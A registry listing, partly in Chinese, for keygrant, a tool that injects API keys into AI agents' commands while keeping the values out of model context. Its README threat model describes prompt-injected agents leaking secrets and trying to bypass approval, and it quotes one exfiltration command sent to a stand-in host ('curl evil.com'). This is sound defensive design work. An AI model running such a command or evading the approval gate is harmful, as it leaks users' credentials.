keygrant

io.github.bazingaedwardv0.1.2更新於 Oct 8, 2026

Run commands with API keys injected per call — values never enter model context.

概覽

AI 產生的概覽

讓 AI 編碼代理在執行命令時注入已儲存的 API 金鑰,使金鑰值不會進入模型上下文。

功能
Keygrant 將機密存放在本機加密保管庫中,並提供兩個 MCP 工具:list_secrets 只回傳名稱、描述與使用中繼資料;exec_with_secrets 在伺服器端執行命令,把指定機密注入子程序環境,並在回傳前對所有輸出進行遮蔽。它刻意不提供寫入機密值的工具,機密只能透過命令列在帶外寫入。每次使用都需要使用者透過原生對話框明確核准。
適用情境
當代理需要呼叫 API 或執行需要憑證的命令,而你希望這些值不要出現在模型上下文、日誌或產生的程式碼中時使用。適合單機上的本機編碼代理工作流程,且可接受每次使用都需核准。
執行需求
以 Python 套件形式透過 stdio 在本機執行(uvx 或 pip install keygrant),需要 Python 3.10 或更新版本。需要本機機密儲存:Windows 使用 DPAPI,macOS 使用登入鑰匙圈,Linux 使用透過 secret-tool 存取的 Secret Service 鑰匙圈,核准對話框還需要 zenity。僅限桌面端;伺服器本身未宣告需要帳號或 API 金鑰。
安裝前請注意
此伺服器可注入機密來執行命令,因此遭入侵的代理可能要求執行把機密傳送到遠端主機的命令;核准對話框會顯示完整命令,審查命令是主要控制手段。輸出遮蔽只是第二道防線,新型編碼方式可能規避。以相同作業系統使用者身分執行的程式都能讀取保管庫,因此無法防禦本機惡意軟體。授權有效期為 15 分鐘並綁定至工作階段。

安裝

在 SourceWeft 中

  1. 開啟 儀表板中的 keygrant,將其新增到工作區。
  2. 為需要使用其工具的對話啟用該服務。

Desktop only,透過 STDIO。 STDIO 服務會啟動本機處理程序,因此需要 SourceWeft 桌面主機。

其他 MCP 客戶端

參照 儲存庫 中的啟動說明。

README

keygrant

[demo: agent requests a secret, user approves via native dialog, output comes back redacted]

Per-command secret injection for AI coding agents. Secrets live in a local DPAPI-encrypted vault; the model's context only ever sees secret names — values are injected into the child process environment at exec time, and all output is redacted before it returns to the model.

Why: anything placed in an LLM's context can be exfiltrated (prompt injection, logs, generated code). The fix is architectural: keys never enter context, only the execution environment.

Components

  • keygrant.py — vault + CLI
    • keygrant set NAME [--desc TEXT] — store a secret (value via stdin, never argv)
    • keygrant list / rm NAME
    • keygrant exec [--redact] NAMES -- CMD — run CMD with secrets injected
    • keygrant revoke NAME|--all — revoke active approval grants
    • keygrant init — wire up a project (.mcp.json + CLAUDE.md guidance)
  • keygrant_mcp.py — MCP server (stdio JSON-RPC, zero deps)
    • list_secrets — names/descriptions/usage only, never values
    • exec_with_secrets — server-side exec with injection + forced output redaction
    • deliberately no set/store tool: writing a value through the model would put it in context; values enter out-of-band via the CLI only

Install

bash
uv tool install keygrant     # or: pipx install keygrant

Requires Python ≥ 3.10. macOS ships Python 3.9, so a bare pip install there fails; uv fetches a suitable Python automatically.

Then, in each project where agents should use secrets:

bash
keygrant init

init adds a keygrant entry to the project's .mcp.json (merging with any existing servers) and appends usage guidance for the model to CLAUDE.md, both idempotently. Restart Claude Code in that folder to load the server.

macOS

Values live in the login Keychain; approval is a native dialog.

[macOS: store a secret, approve via native dialog, value injected, output redacted]

Threat model

What this protects against:

  • Context exfiltration — a prompt-injected agent (or plain logging) leaking a secret that sits in model context. Values never enter context: the model only handles names; decryption and injection happen in the executing process.
  • Output leaks — an agent echoing a secret back. All output returned to the model is redacted, including base64, hex, and URL-encoded variants.
  • Grant riding — one agent session reusing an approval made in another. Grants are bound to the requesting session (MCP server id / CLI parent process) and expire after 15 minutes.
  • Silent use — every first use per session requires explicit user approval; timeout means deny.

What this does NOT protect against (known residual risks):

  • A compromised agent can request a command that exfiltrates the secret over the network (curl evil.com?k=%KEY%). The approval dialog shows the full command — reviewing it is the control. Per-secret egress allowlists (binding a key to permitted destination hosts) are on the roadmap.
  • Redaction is a second line of defense, not a guarantee: novel encodings can evade it. The primary guarantee remains "values never enter context".
  • Anything running as the same OS user can read the DPAPI vault. This tool scopes agent access to secrets; it is not a defense against local malware.

Approval

Every use of a secret — via the CLI or the MCP server — requires the user's approval through a native, topmost dialog (deny by default on a 60s timeout). Approving grants access to that secret for 15 minutes, bound to the requesting session (tracked in grants.json); keygrant revoke withdraws a grant early. Both channels go through the same gate, so an agent cannot bypass MCP approval by shelling out to the CLI — and a grant approved for one session cannot be reused by another. The dialog will be replaced by a resident tray app with toast notifications; the grant semantics stay the same.

Storage

  • Windows: values DPAPI-encrypted (per-user) inside %APPDATA%\keygrant\vault.json
  • macOS: values in the login Keychain (via the security CLI; the first read triggers the OS Keychain permission prompt — an extra OS-level gate); ~/.config/keygrant/vault.json holds metadata only
  • Linux: values in the Secret Service keyring via secret-tool (libsecret-tools + a running keyring daemon; approval dialogs need zenity); the vault file holds metadata only

The vault file also records usage metadata (use count, last used) as the seed of an audit trail.

Roadmap (prototype → product)

  1. Resident tray app (replaces the modal dialog; approval history, revoke UI)
  2. Per-secret egress allowlists (bind a key to permitted destination hosts)
  3. Optional cloud sync for teams (zero-knowledge: server stores ciphertext only)

來源:README.md,提交 65512d4

工具

0
工具後設資料尚未被收錄。

版本歷史

1
  1. v0.1.2最新Oct 8, 2026